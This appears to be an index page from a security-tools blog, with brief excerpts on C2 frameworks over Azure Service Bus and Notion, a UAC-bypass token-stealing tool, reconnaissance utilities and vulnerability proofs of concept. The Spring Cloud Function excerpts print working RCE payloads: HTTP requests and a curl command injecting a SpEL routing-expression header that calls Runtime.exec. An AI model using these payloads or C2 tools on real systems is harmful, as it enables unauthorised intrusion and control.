CobaltBus : Cobalt Strike External C2 Integration With Azure Servicebus, C2 Traffic Via Azure Servicebus
.png "CobaltBus : Cobalt Strike External C2 Integration With Azure Servicebus, C2 Traffic Via Azure Servicebus")
CobaltBus is a Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus Setup Create an Azure Service BusCreate a Shared access policy (Connection string) that can only Send and ListenEdit the static connectionString variable in Beacon C# projects to match the "Primary Connection String" value for the Shared access policy created in step 2.The same variables need...
Odin : Central IoC Scanner Based On Loki
.png "Odin : Central IoC Scanner Based On Loki")
Odin is a central IoC scanner based on Loki. General Info This application Loki latest version and download it on all machines using a powershell script and run it then this app receives the respose from all machines and parse the feed in CSV form. Requirements Python +3.5PyQT5psutilpyparsingzipfile Fetch Odin download and extract the latest version on Loki and start HTTP server to deliver the...
Auto-Elevate : Escalate From A Low-Integrity Administrator Account To NT AUTHORITYSYSTEM
.png "Auto-Elevate : Escalate From A Low-Integrity Administrator Account To NT AUTHORITY\SYSTEM")
Auto-Elevate tool demonstrates the power of UAC bypasses and built-in features of Windows. This utility auto-locates winlogon.exe, steals and impersonates it's process TOKEN, and spawns a new SYSTEM-level process with the stolen token. Combined with UAC bypass method #41 (ICMLuaUtil UAC bypass) from hfiref0x's UACME utility, this utility can auto-elevate a low privileged Administrative account to NT AUTHORITYSYSTEM. The following...
Subdomains.Sh : A Wrapper Around Tools I Use For Subdomain Enumeration On A Given Domain
.png "Subdomains.Sh : A Wrapper Around Tools I Use For Subdomain Enumeration On A Given Domain")
Subdomains.Sh is a wrapper around tools used for subdomain enumeration, to automate the workflow, on a given domain, written in bash. The Workflow Installation Run the installation script: curl -s https://raw.githubusercontent.com/enenumxela/subdomains.sh/main/install.sh | bash - Or run in an ephemeral Docker container: Clone the repository and run cd subdomains.shBuild the container image./docker-subdomains.sh buildAfter build, you can run the script with the same options listed above.Each run will...
Slyther : AWS Security Tool
Slyther is AWS Security tool to check read/write/delete access for S3 buckets. Requirements aws-cli Installation pip3 install -r requirements.txt Usage example python3 slyther.py -b flaws.cloud Download
Spring-Spel-0Day-Poc : Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression
Spring-Spel-0Day-Poc is spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") build wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zipunzip v3.1.6.zipcd spring-cloud-function-3.1.6cd spring-cloud-function-samples/function-sample-pojomvn packagejava -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar get path lists for test find . -name "*.java"|xargs -I % cat %|grep -Eo '"({8,})"'|sort -u|sed 's/"//g' …functionRouteruppercaselowercase… poc1 POST /functionRouter HTTP/1.1host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15Connection: closespring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")Content-Length: 5 poc2 POST /functionRouter HTTP/1.1host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15...
Cloak : A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries
.png "Cloak : A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries")
Cloak is a pluggable transport that enhances traditional proxy tools like OpenVPN to evade sophisticated censorship and data discrimination. Cloak is not a standalone proxy program. Rather, it works by masquerading proxied traffic as normal web browsing activities. In contrast to traditional tools which have very prominent traffic fingerprints and can be blocked by simple filtering rules, it's very difficult to precisely target Cloak with...
OffensiveNotion : Notion As A Platform For Offensive Operations
OffensiveNotion combines the capabilities of a post-exploitation agent with the power and comfort of the Notion notetaking application. The agent sends data to and receives commands from your Notion page. Your C2 traffic blends right in as the agent receives instructions and posts results via the Notion developer API. And when your blue team looks for evidence of shenanigans,...
CVE-2022-27254 : PoC For Vulnerability In Honda’s Remote Keyless System
.png "CVE-2022-27254 : PoC For Vulnerability In Honda’s Remote Keyless System")
CVE-2022-27254 is a PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254). Summary This is a proof of concept for CVE-2022-27254, wherein the remote keyless system on various Honda vehicles send the same, unencrypted RF signal for each door-open, door-close, boot-open and remote start(if applicable). This allows for an attacker to eavesdrop on the request and conduct a replay attack. Vehicles Affected • 2016-2020 Honda...
CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
.png "CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability")
CVE-2022-22963 is to run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' Or using Burp suite: Download
